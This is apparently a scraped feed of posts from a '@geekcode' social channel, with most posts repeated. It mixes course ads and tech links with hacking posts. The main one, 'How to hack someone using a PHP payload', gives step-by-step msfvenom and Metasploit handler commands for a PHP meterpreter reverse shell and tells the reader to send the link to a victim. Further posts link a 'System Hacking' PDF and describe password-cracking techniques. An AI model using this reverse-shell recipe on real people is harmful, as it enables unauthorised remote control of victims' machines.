https://www.udemy.com/course/spring-5-with-spring-boot-2/?couponCode=TELUSKONOV20
#share & #supportus
--------------------> @geekcode 📍
Share as more as 😍
#share & #supportus
--------------------> @geekcode 📍
Share as more as 😍
Udemy
Java Spring Framework 6, Spring Boot 3, Spring AI Telusko
Master Java, Spring 6 and Spring Boot 3 , Spring JPA, Security, Spring AI, Docker and Microservices with Telusko
#AINews: Microsoft has teamed up with a nonprofit using autonomous ‘interceptor’ boats to clean up the ocean and is helping it identify trash with machine learning. 🌊
Learn more on: https://www.businessinsider.com/microsoft-machine-learning-for-the-ocean-cleanup-project-2020-10
#share & #supportus
-----------------------> @geekcode 📍
Share as more as 😍
Learn more on: https://www.businessinsider.com/microsoft-machine-learning-for-the-ocean-cleanup-project-2020-10
#share & #supportus
-----------------------> @geekcode 📍
Share as more as 😍
Hey guys Geek-Code is Here ♥️
Road to 1.6k 🙏
Only 20 subscribers left to achieve at 1.6k😍
#share us for Care us #supportus
@geekcode 📍
Road to 1.6k 🙏
Only 20 subscribers left to achieve at 1.6k😍
#share us for Care us #supportus
@geekcode 📍
All-in-One Facebook Ads Course! From Beginner To Advanced!
Step By Step Guide Of How To Create Different Ad Campaigns, Pixel, Custom & Lookalike Audiences, Retargeting And More!
How To Create A FB Business Account
How To Create Ad Account
How To Add Payment Method
Security Measure – How To Set Ad Spent Limit
ENROLL HERE-:
https://geekcode.com/Facebook-Ads-Course
#share & #supportus
---------------> @geekcode 📍
Share as more as 😍
Step By Step Guide Of How To Create Different Ad Campaigns, Pixel, Custom & Lookalike Audiences, Retargeting And More!
How To Create A FB Business Account
How To Create Ad Account
How To Add Payment Method
Security Measure – How To Set Ad Spent Limit
ENROLL HERE-:
https://geekcode.com/Facebook-Ads-Course
#share & #supportus
---------------> @geekcode 📍
Share as more as 😍
🗃 WEBSITE OF THE DAY👨💻
━━━━━━━━━━━━
Website: Devdocs.io
A fast ,offline, free and reliable document browser for devlopers. One of the best websites to get free resources for beginner programmers. Search 100+ Doc's in one, HTLM, C++, JAVA, PYTHON, Etc.
#share & #supportus
----------------> @geekcode 📍
Share as more as 😍
━━━━━━━━━━━━
Website: Devdocs.io
A fast ,offline, free and reliable document browser for devlopers. One of the best websites to get free resources for beginner programmers. Search 100+ Doc's in one, HTLM, C++, JAVA, PYTHON, Etc.
#share & #supportus
----------------> @geekcode 📍
Share as more as 😍
Hey guys Geek-Code is Here ♥️
Road to 1.6k 🙏
Only 20 subscribers left to achieve at 1.6k😍
#share us for Care us #supportus
@geekcode 📍
Road to 1.6k 🙏
Only 20 subscribers left to achieve at 1.6k😍
#share us for Care us #supportus
@geekcode 📍
🔰 Vulnerability Database And Resources For Free 🔰
Vulnerability Database are the first place to start your day as a security professional. Any new vulnerability detection is generally available through public vulnerability database. These database are a big source of information for hackers to be able to understand and exploit/avoid/fix the vulnerability. Some Public Sources for you -
⚡️http://www.exploit-db.com/
⚡️http://securityvulns.com/
⚡️http://www.securityfocus.com/
⚡️http://www.securiteam.com/
⚡️http://secunia.com/advisories/
⚡️http://insecure.org/sploits_all.html
⚡️http://zerodayinitiative.com/advisories/published/
⚡️http://nmrc.org/pub/index.html
⚡️http://web.nvd.nist.gov
⚡️http://cvedetails.com/
⚡️http://www.rapid7.com/vulndb/index.jsp
⚡️http://oval.mitre.org
#share us for Care us #supportus
@geekcode 📍
Vulnerability Database are the first place to start your day as a security professional. Any new vulnerability detection is generally available through public vulnerability database. These database are a big source of information for hackers to be able to understand and exploit/avoid/fix the vulnerability. Some Public Sources for you -
⚡️http://www.exploit-db.com/
⚡️http://securityvulns.com/
⚡️http://www.securityfocus.com/
⚡️http://www.securiteam.com/
⚡️http://secunia.com/advisories/
⚡️http://insecure.org/sploits_all.html
⚡️http://zerodayinitiative.com/advisories/published/
⚡️http://nmrc.org/pub/index.html
⚡️http://web.nvd.nist.gov
⚡️http://cvedetails.com/
⚡️http://www.rapid7.com/vulndb/index.jsp
⚡️http://oval.mitre.org
#share us for Care us #supportus
@geekcode 📍
🔰HOW TO HACK SOMEONE USING A PHP~PAYLOAD🔰
💖sᴏ ʟᴇᴛs ᴍᴀᴋᴇ ᴘᴀʏʟᴏᴀᴅs ᴡɪᴛʜ ᴘʜᴘ ᴜsɪɴɢ ᴍsғᴠᴇᴍᴏɴ
💖ᴡʜᴀᴛ ɪs ᴍsғᴠᴇᴍᴏɴ?? ᴡᴇʟʟ ᴍᴇᴛᴀsᴘʟᴏɪᴛ ғʀᴀᴍᴇᴡᴏʀᴋ ᴠᴇɴᴏᴍ ɪs ᴀ ᴘᴀʏʟᴏᴀᴅ ɢᴇɴ ᴜsᴇᴅ ᴏɴ ʟɪɴᴜɴx ᴛᴏ ɢᴇɴᴇʀᴀᴛᴇ ᴘᴀʏʟᴏᴀᴅs ғᴏʀ ᴇxᴘʟᴏɪᴛᴀᴛɪᴏɴ
💖ʟᴇᴛs sᴛᴀʀᴛ ʙʏ sᴛᴀʀᴛɪɴɢ ᴀᴘᴀᴄʜᴇ2 sᴏ ᴏᴘᴇɴ ᴛᴇʀᴍɪɴᴀʟ ᴀɴᴅ ᴛʏᴘᴇ
ᴄᴏᴅᴇ:
–––––––––––––––––––
sᴇʀᴠɪᴄᴇ ᴀᴘᴀᴄʜᴇ2 sᴛᴀʀᴛ
🌀sᴛᴇᴘ 1:
ɴᴏᴡ ᴡᴇ ɴᴇᴇᴅ ᴏᴜʀ ʟᴏᴄᴀʟ ɪᴘ ᴏʀ ᴇxᴛᴇʀɴᴀʟ ɪᴘ ғᴏʀ ʟᴏᴄᴀʟ ɪᴘ ᴇɴᴛᴇʀ
ᴄᴏᴅᴇ:
–––––––––––––––––––
ɪғᴄᴏɴғɪɢ
ᴀɴᴅ ғᴏʀ ᴇxᴛᴇʀɴᴀʟ ɢᴏᴏɢʟᴇ ᴡʜᴀᴛs ᴍʏ ɪᴘ
ɴᴏᴛᴇ ɪғ ᴜsɪɴɢ ᴇxᴛᴇʀɴᴀʟ ʟɪɴᴋ ᴜ ɴᴇᴇᴅ ᴛᴏ ғᴏʀᴡᴀʀᴅ ᴛʜᴇ ᴘᴏʀᴛs ᴏɴ ʏᴏᴜʀ ʀᴏᴜᴛᴇʀ
🌀sᴛᴇᴘ 2:
ɴᴏᴡ ʏᴏᴜ ʜᴀᴠᴇ ᴛʜᴇ ʟᴏᴄᴀʟ ɪᴘ, sᴏ ʟᴇᴛs ᴍᴀᴋᴇ ᴛʜᴇ ᴘᴀʏʟᴏᴀᴅ
ᴇɴᴛᴇʀ ᴛʜɪs ᴄᴏᴍᴍᴀɴᴅ:
ᴄᴏᴅᴇ:
–––––––––––––––––––
ᴍsғᴠᴇɴᴏᴍ -ᴘ ᴘʜᴘ/ᴍᴇᴛᴇʀᴘʀᴇᴛᴇʀ/ʀᴇᴠᴇʀsᴇ_ᴛᴄᴘ ʟʜᴏsᴛ= 192.168.8.107 ʟᴘᴏʀᴛ=4444 -ᴇ ᴘʜᴘ/ʙᴀsᴇ64 -ғ ʀᴀᴡ > /ʀᴏᴏᴛ/ᴅᴇsᴋᴛᴏᴘ/ʜᴏᴍᴇ.ᴘʜᴘ
🌀sᴛᴇᴘ 3:
ɴᴏᴡ ɢᴏ ᴛᴏ ᴛʜᴇ ᴅᴇsᴋᴛᴏᴘ ᴀɴᴅ ᴄᴏᴘʏ ᴛʜᴇ ᴘᴀʏʟᴏᴀᴅ ᴛᴏ ʏᴏᴜʀ ʜᴛᴍʟ ғɪʟᴇ ɪɴ /ᴠᴀʀ/ᴡᴡ ᴡ/ʜᴛᴍʟ ғᴏʟᴅᴇʀ
ʀᴇᴍᴏᴠᴇ ᴛʜᴇ sᴘᴀᴄᴇ ^^
🌀sᴛᴇᴘ 4:
ɴᴏᴡ ᴏᴘᴇɴ ᴀ ɴᴇᴡ ᴛᴇʀᴍɪɴᴀʟ ᴀɴᴅ ᴛʏᴘᴇ
ᴄᴏᴅᴇ:
–––––––––––––––––––
MSFCONSOL
🌀sᴛᴇᴘ 5:
TYPE BELOW COMMAND'S
ᴄᴏᴅᴇ:
–––––––––––––––––––
USE EXPLOIT/MULTI/HANDLER
ᴄᴏᴅᴇ:
–––––––––––––––––––
SET PAYLOAD PHP/METERPRETER/REVERSE_TCP
ᴄᴏᴅᴇ:
–––––––––––––––––––
SET LHOST [YOUR LOCAL IP]
ᴄᴏᴅᴇ:
–––––––––––––––––––
SET LPORT 4444
ᴄᴏᴅᴇ:
–––––––––––––––––––
EXPLOIT
🌀sᴛᴇᴘ 6:
ɴᴏᴡ sᴇɴᴅ ᴛʜᴇ ᴠɪᴄᴛᴜᴍ ᴛʜᴇ ʟɪɴᴋ 192.168.8.107:4444/Home.php
🌀sᴛᴇᴘ 7:
ɴᴏᴡ ᴛʏᴘᴇ ʜᴇʟᴘ ᴀɴᴅ ʏᴏᴜ ɢᴇᴛ ᴀ ғᴜʟʟ ʟɪsᴛ ᴄᴏᴍᴍᴀɴᴅs ʏᴏᴜ ᴄᴀɴ ʀᴜɴ ᴜɴᴅᴇʀ ᴍᴇᴛᴀsᴘʟᴏɪᴛ
#share & #supportus
---------------------> @geekcode 📍
Share as more as 😍
💖sᴏ ʟᴇᴛs ᴍᴀᴋᴇ ᴘᴀʏʟᴏᴀᴅs ᴡɪᴛʜ ᴘʜᴘ ᴜsɪɴɢ ᴍsғᴠᴇᴍᴏɴ
💖ᴡʜᴀᴛ ɪs ᴍsғᴠᴇᴍᴏɴ?? ᴡᴇʟʟ ᴍᴇᴛᴀsᴘʟᴏɪᴛ ғʀᴀᴍᴇᴡᴏʀᴋ ᴠᴇɴᴏᴍ ɪs ᴀ ᴘᴀʏʟᴏᴀᴅ ɢᴇɴ ᴜsᴇᴅ ᴏɴ ʟɪɴᴜɴx ᴛᴏ ɢᴇɴᴇʀᴀᴛᴇ ᴘᴀʏʟᴏᴀᴅs ғᴏʀ ᴇxᴘʟᴏɪᴛᴀᴛɪᴏɴ
💖ʟᴇᴛs sᴛᴀʀᴛ ʙʏ sᴛᴀʀᴛɪɴɢ ᴀᴘᴀᴄʜᴇ2 sᴏ ᴏᴘᴇɴ ᴛᴇʀᴍɪɴᴀʟ ᴀɴᴅ ᴛʏᴘᴇ
ᴄᴏᴅᴇ:
–––––––––––––––––––
sᴇʀᴠɪᴄᴇ ᴀᴘᴀᴄʜᴇ2 sᴛᴀʀᴛ
🌀sᴛᴇᴘ 1:
ɴᴏᴡ ᴡᴇ ɴᴇᴇᴅ ᴏᴜʀ ʟᴏᴄᴀʟ ɪᴘ ᴏʀ ᴇxᴛᴇʀɴᴀʟ ɪᴘ ғᴏʀ ʟᴏᴄᴀʟ ɪᴘ ᴇɴᴛᴇʀ
ᴄᴏᴅᴇ:
–––––––––––––––––––
ɪғᴄᴏɴғɪɢ
ᴀɴᴅ ғᴏʀ ᴇxᴛᴇʀɴᴀʟ ɢᴏᴏɢʟᴇ ᴡʜᴀᴛs ᴍʏ ɪᴘ
ɴᴏᴛᴇ ɪғ ᴜsɪɴɢ ᴇxᴛᴇʀɴᴀʟ ʟɪɴᴋ ᴜ ɴᴇᴇᴅ ᴛᴏ ғᴏʀᴡᴀʀᴅ ᴛʜᴇ ᴘᴏʀᴛs ᴏɴ ʏᴏᴜʀ ʀᴏᴜᴛᴇʀ
🌀sᴛᴇᴘ 2:
ɴᴏᴡ ʏᴏᴜ ʜᴀᴠᴇ ᴛʜᴇ ʟᴏᴄᴀʟ ɪᴘ, sᴏ ʟᴇᴛs ᴍᴀᴋᴇ ᴛʜᴇ ᴘᴀʏʟᴏᴀᴅ
ᴇɴᴛᴇʀ ᴛʜɪs ᴄᴏᴍᴍᴀɴᴅ:
ᴄᴏᴅᴇ:
–––––––––––––––––––
ᴍsғᴠᴇɴᴏᴍ -ᴘ ᴘʜᴘ/ᴍᴇᴛᴇʀᴘʀᴇᴛᴇʀ/ʀᴇᴠᴇʀsᴇ_ᴛᴄᴘ ʟʜᴏsᴛ= 192.168.8.107 ʟᴘᴏʀᴛ=4444 -ᴇ ᴘʜᴘ/ʙᴀsᴇ64 -ғ ʀᴀᴡ > /ʀᴏᴏᴛ/ᴅᴇsᴋᴛᴏᴘ/ʜᴏᴍᴇ.ᴘʜᴘ
🌀sᴛᴇᴘ 3:
ɴᴏᴡ ɢᴏ ᴛᴏ ᴛʜᴇ ᴅᴇsᴋᴛᴏᴘ ᴀɴᴅ ᴄᴏᴘʏ ᴛʜᴇ ᴘᴀʏʟᴏᴀᴅ ᴛᴏ ʏᴏᴜʀ ʜᴛᴍʟ ғɪʟᴇ ɪɴ /ᴠᴀʀ/ᴡᴡ ᴡ/ʜᴛᴍʟ ғᴏʟᴅᴇʀ
ʀᴇᴍᴏᴠᴇ ᴛʜᴇ sᴘᴀᴄᴇ ^^
🌀sᴛᴇᴘ 4:
ɴᴏᴡ ᴏᴘᴇɴ ᴀ ɴᴇᴡ ᴛᴇʀᴍɪɴᴀʟ ᴀɴᴅ ᴛʏᴘᴇ
ᴄᴏᴅᴇ:
–––––––––––––––––––
MSFCONSOL
🌀sᴛᴇᴘ 5:
TYPE BELOW COMMAND'S
ᴄᴏᴅᴇ:
–––––––––––––––––––
USE EXPLOIT/MULTI/HANDLER
ᴄᴏᴅᴇ:
–––––––––––––––––––
SET PAYLOAD PHP/METERPRETER/REVERSE_TCP
ᴄᴏᴅᴇ:
–––––––––––––––––––
SET LHOST [YOUR LOCAL IP]
ᴄᴏᴅᴇ:
–––––––––––––––––––
SET LPORT 4444
ᴄᴏᴅᴇ:
–––––––––––––––––––
EXPLOIT
🌀sᴛᴇᴘ 6:
ɴᴏᴡ sᴇɴᴅ ᴛʜᴇ ᴠɪᴄᴛᴜᴍ ᴛʜᴇ ʟɪɴᴋ 192.168.8.107:4444/Home.php
🌀sᴛᴇᴘ 7:
ɴᴏᴡ ᴛʏᴘᴇ ʜᴇʟᴘ ᴀɴᴅ ʏᴏᴜ ɢᴇᴛ ᴀ ғᴜʟʟ ʟɪsᴛ ᴄᴏᴍᴍᴀɴᴅs ʏᴏᴜ ᴄᴀɴ ʀᴜɴ ᴜɴᴅᴇʀ ᴍᴇᴛᴀsᴘʟᴏɪᴛ
#share & #supportus
---------------------> @geekcode 📍
Share as more as 😍
Ethical Hacking and Countermeasures
• Password cracking
• Password attacks
• Identifying various password cracking tools
• Formulating countermeasures for password cracking
• Escalating privileges
• Executing applications
• Keyloggers and Spywares
• Spywares and keyloggers countermeasures
• Hiding files
• Understanding rootkits
• The use of Steganography
• Covering tracks
https://anonfiles.com/10T3G4jbp7/System_Hacking_pdf
"Get all the ideas about system hacking."
#share & #supportus
----------------> @geekcode 📍
Share as more as 😍
• Password cracking
• Password attacks
• Identifying various password cracking tools
• Formulating countermeasures for password cracking
• Escalating privileges
• Executing applications
• Keyloggers and Spywares
• Spywares and keyloggers countermeasures
• Hiding files
• Understanding rootkits
• The use of Steganography
• Covering tracks
https://anonfiles.com/10T3G4jbp7/System_Hacking_pdf
"Get all the ideas about system hacking."
#share & #supportus
----------------> @geekcode 📍
Share as more as 😍
🔰Password cracking techniques🔰
✨There are a number of techniques that can be used to crack passwords. We will describe the most commonly used ones below ;
🌀Dictionary attack – This method involves the use of a wordlist to compare against user passwords.
🌀Brute force attack – This method is similar to the dictionary attack. Brute force attacks use algorithms that combine alpha-numeric characters and symbols to come up with passwords for the attack. For example, a password of the value “password” can also be tried as p@$$word using the brute force attack.
🌀Rainbow table attack – This method uses pre-computed hashes. Let’s assume that we have a database which stores passwords as md5 hashes. We can create another database that has md5 hashes of commonly used passwords. We can then compare the password hash we have against the stored hashes in the database. If a match is found, then we have the password.
🌀Guess – As the name suggests, this method involves guessing. Passwords such as qwerty, password, admin, etc. are commonly used or set as default passwords. If they have not been changed or if the user is careless when selecting passwords, then they can be easily compromised.
🌀Spidering – Most organizations use passwords that contain company information. This information can be found on company websites, social media such as facebook, twitter, etc. Spidering gathers information from these sources to come up with word lists. The word list is then used to perform dictionary and brute force attacks.
#share & #supportus
----------------> @geekcode 📍
Share as more as 😍
✨There are a number of techniques that can be used to crack passwords. We will describe the most commonly used ones below ;
🌀Dictionary attack – This method involves the use of a wordlist to compare against user passwords.
🌀Brute force attack – This method is similar to the dictionary attack. Brute force attacks use algorithms that combine alpha-numeric characters and symbols to come up with passwords for the attack. For example, a password of the value “password” can also be tried as p@$$word using the brute force attack.
🌀Rainbow table attack – This method uses pre-computed hashes. Let’s assume that we have a database which stores passwords as md5 hashes. We can create another database that has md5 hashes of commonly used passwords. We can then compare the password hash we have against the stored hashes in the database. If a match is found, then we have the password.
🌀Guess – As the name suggests, this method involves guessing. Passwords such as qwerty, password, admin, etc. are commonly used or set as default passwords. If they have not been changed or if the user is careless when selecting passwords, then they can be easily compromised.
🌀Spidering – Most organizations use passwords that contain company information. This information can be found on company websites, social media such as facebook, twitter, etc. Spidering gathers information from these sources to come up with word lists. The word list is then used to perform dictionary and brute force attacks.
#share & #supportus
----------------> @geekcode 📍
Share as more as 😍